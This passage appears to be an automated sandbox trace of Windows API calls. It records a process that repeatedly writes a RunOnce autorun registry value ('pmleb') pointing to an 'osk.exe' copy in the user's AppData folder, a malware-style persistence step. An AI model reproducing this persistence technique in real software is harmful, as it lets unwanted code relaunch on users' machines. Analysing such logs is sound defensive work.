ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.298] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.298] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.298] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.298] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.298] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.298] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.299] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.299] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.299] RegCloseKey (hKey=0x280) returned 0x0 [0092.299] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.299] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.299] SetTimer (hWnd=0x20280, nIDEvent=0x21f4, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f4 [0092.299] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.312] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.312] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.313] KillTimer (hWnd=0x20280, uIDEvent=0x21f4) returned 1 [0092.313] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.313] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.313] IUnknown:Release (This=0x787518) returned 0x1 [0092.313] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.313] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.314] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.314] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.314] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x79 [0092.314] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.314] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7a [0092.314] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.315] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x79 [0092.316] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.316] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.316] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.316] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.316] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.316] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.316] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.316] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.316] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.316] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.316] RegCloseKey (hKey=0x280) returned 0x0 [0092.317] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.317] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.317] SetTimer (hWnd=0x20280, nIDEvent=0x21f5, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f5 [0092.317] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.326] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.326] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.327] KillTimer (hWnd=0x20280, uIDEvent=0x21f5) returned 1 [0092.327] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.327] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.327] IUnknown:Release (This=0x787518) returned 0x1 [0092.327] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.327] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.327] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.328] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.328] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7a [0092.328] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.328] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7b [0092.328] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.329] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7a [0092.329] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.329] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.329] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.329] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.330] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.330] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.330] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.330] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.330] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.330] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.330] RegCloseKey (hKey=0x280) returned 0x0 [0092.330] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.330] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.331] SetTimer (hWnd=0x20280, nIDEvent=0x21f6, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f6 [0092.331] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.343] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.343] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.343] KillTimer (hWnd=0x20280, uIDEvent=0x21f6) returned 1 [0092.343] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.343] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.344] IUnknown:Release (This=0x787518) returned 0x1 [0092.344] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.344] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.344] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.344] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.344] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.344] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.344] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.344] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.344] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.344] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7b [0092.345] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.345] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7c [0092.345] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.346] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7b [0092.346] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.346] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.346] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.346] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.346] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.346] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.346] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.346] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.347] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.347] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | 